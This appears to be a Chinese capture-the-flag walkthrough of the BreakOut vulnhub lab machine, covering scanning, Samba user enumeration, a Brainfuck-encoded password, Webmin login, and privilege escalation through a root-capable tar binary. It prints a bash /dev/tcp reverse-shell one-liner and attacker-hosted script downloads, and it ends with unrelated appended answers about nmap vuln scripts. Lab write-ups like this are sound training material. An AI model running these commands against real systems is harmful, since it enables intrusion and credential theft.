vuln靶机--BreakOut

一、信息收集

常规的主机发现以及端口扫描,扫描自己所在的网段。

nmap 192.168.216.0/24
nmap -A -v -T4 -p 1-65535 192.168.216.149

可以看到服务器开启了80端口,139和445端口是samba服务,实现文件共享,10000和20000端口则是搭建了cms,而且版本也暴露了出来。

二、漏洞发现

首先先来查看80端口,只是一个普通的apache的index文件,apache的版本也比较高,因此并没有发现漏洞

在查看了源代码后,在底部发现了一段加密过的字符串,通过网上搜查到这是一段brainfuck加密

在线网站brainfuck加解密:Brainfuck/Ook! Obfuscation/Encoding [splitbrain.org]

解密后得到:.2uqPEfj3D<P'a-3

接着对80端口进行目录扫描

但是并没有有用的信息。

接下来探测10000端口和20000端口

2个端口都是这样一个登录页面,但是2个cms版本不一样,从页面上看到这是一个webmin的cms。在网上查找该cms的漏洞,但是cve很多,一个个尝试需要时间,因此先放一放。

samba服务可以使用enum4linux工具来枚举用户

enum4linux 192.168.216.149

爆出了一个用户cyber,结合上面找出的密码.2uqPEfj3D<P'a-3,直接尝试登录。

10000端口失败

20000端口成功

在这里找到了一个command shell,打开得到第一个flag。

三、权限提升

查看该用户下的文件,有一个tar命令是root权限。

先反弹shell到kali下,方便后续提权

bash -c 'exec bash -i &>/dev/tcp/192.168.216.128/8888 <&1'

反弹成功

接着信息收集,查看系统版本

版本较新,搜索exp后发现没有漏洞。

上传信息收集脚本,现在kali上搭建http服务,然后在服务器下载脚本文件

python -m SimpleHTTPServer 8080
wget http://192.168.216.128:8080/LinEnum.sh

运行LinEnum.sh文件,查看suid文件,并没有发现可利用之处。

suid提权一般有find、cp、nmap、vim、bash、more、less、nano等常见命令

在最后发现一个可疑文件.old_pass.bak,怀疑是存储了以前的密码,但是是root权限,当前用户并不能查看,联想到上面的root权限的tar文件,因此可以使用tar命令对该文件进行压缩和解压的操作,这样权限就变成了当前用户。

./tar -czvf passwd.tar.gz /var/backups/.old_pass.bak
./tar -xzvf passwd.tar.gz
cat /var/backups/.old_pass.bak

查看文件后得到一个密钥:Ts&4&YurgtRX(=~h

尝试登录到root

权限提升成功,完结!!!


总结

samba服务可以使用enum4linux工具来枚举

brainfuck加密

cve的获取

root权限二进制文件

### 回答1: nmap --script=vuln是一个nmap命令,用于扫描目标主机的漏洞。该命令会使用nmap的漏洞扫描脚本(vuln)来检测目标主机上可能存在的漏洞。使用该命令可以帮助管理员及时发现并修复系统中的漏洞,提高系统的安全性。 ### 回答2: nmap是一种常用的网络扫描工具,可以用来检测网络上的设备并识别它们的服务和操作系统信息。同时,nmap还提供了一些强大的脚本和工具箱,以帮助用户发现系统中可能存在的漏洞。 使用“nmap --script=vuln”命令可以使用nmap内置的漏洞扫描脚本,这些脚本能够检测目标系统中可能存在的安全漏洞。该命令会启用所有的漏洞扫描脚本,并提供有关目标系统检测结果的详细信息。 在使用“nmap --script=vuln”命令进行漏洞扫描时,可以通过在命令行上使用“-p”参数来指定要扫描的端口范围。对于大型网络中的目标系统,也可以通过指定IP地址范围或使用文件来进行扫描。 当nmap执行漏洞扫描脚本时,脚本会自动检测目标系统中存在的漏洞并生成报告。该报告包含了有关检测到的漏洞的详细信息,例如漏洞名称、等级和漏洞对应的CVE编号等。在扫描过程中,可以使用“-vvv”参数来显示更详细的扫描信息,以便更好地了解扫描的情况。 对于系统管理员和安全专业人士来说,nmap的漏洞扫描功能对于确保系统安全和保护系统免受攻击至关重要。然而,使用该命令进行系统扫描和漏洞检测需要谨慎,因为它可能会导致系统故障或误报漏洞。在使用nmap进行系统扫描之前,确保您已经获得同意,并且对扫描的目标系统进行备份和恢复。 ### 回答3: nmap是一款用于扫描网络主机的开源工具,其功能强大,支持多种操作系统。nmap自带的脚本能够实现许多针对主机的基本漏洞测试,其中就包括vuln脚本。 nmap --script=vuln是指使用vuln脚本来扫描目标网络主机,该脚本是nmap自带的一个组件,用于检测主机是否存在已知的漏洞。如果存在漏洞,则通过输出详细的报告提供可能存在的风险。 使用vuln脚本的方式简单直接,只需要在nmap命令行后加上--script=vuln即可进行扫描。扫描完毕后,nmap会输出详细报告,包含目标主机的漏洞及可能受到的影响。 总体来说,nmap --script=vuln用于检测目标网络主机的漏洞并提供风险报告,有效促进网络安全运营。但是需要注意的是,该脚本只能检测到已知的漏洞,因此不能完全替代其他安全测试工具的使用。在实际应用中,应该综合考虑多种工具的使用,提升网络安全性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值